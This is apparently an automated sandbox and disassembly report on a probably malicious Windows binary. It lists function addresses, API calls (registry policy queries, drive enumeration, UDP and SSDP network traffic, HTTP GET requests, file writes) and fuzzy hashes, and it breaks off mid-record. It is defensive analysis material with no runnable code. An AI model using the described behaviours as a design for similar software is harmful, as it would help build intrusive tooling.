Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99

Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04

Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94

Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407726
srand.MSVCRT ref: 0040772D
rand.MSVCRT ref: 00407735
Sleep.KERNEL32 ref: 00407746
StrChrA.SHLWAPI(00000000,0000007C), ref: 0040776C
Sleep.KERNEL32(000003E8), ref: 0040779D

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56

Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040986D
_aullshr.NTDLL ref: 0040987E
_allshl.NTDLL ref: 004098A0
_aullshr.NTDLL ref: 004098BC
_allshl.NTDLL ref: 004098DE
_aullshr.NTDLL ref: 004098FA

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB

Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4

Strings

?c@, xrefs: 00406369, 004063A8, 0040636C, 004063AB
\??\, xrefs: 004063B8

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: ?c@$\??\
API String ID: 1681518211-744975932
Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99

Function 0040B530 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID:
API String ID: 442028454-0
Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99

Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040944E
_allshl.NTDLL ref: 0040945D
_allshl.NTDLL ref: 0040946C
_allshl.NTDLL ref: 0040947B
_allshl.NTDLL ref: 0040948A

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
CloseHandle.KERNEL32(?), ref: 0040DED8
LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28

Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
SysAllocString.OLEAUT32(004161D0), ref: 004073A3
CoUninitialize.OLE32 ref: 004073C8

Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8

SysFreeString.OLEAUT32(00000000), ref: 004073C2

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755

Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690

SysFreeString.OLEAUT32(00000000), ref: 004075F8

Strings

Microsoft Corporation, xrefs: 00407566

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66

Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837

Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621

SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

%S%S, xrefs: 0040E4C6

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1

Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA

Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

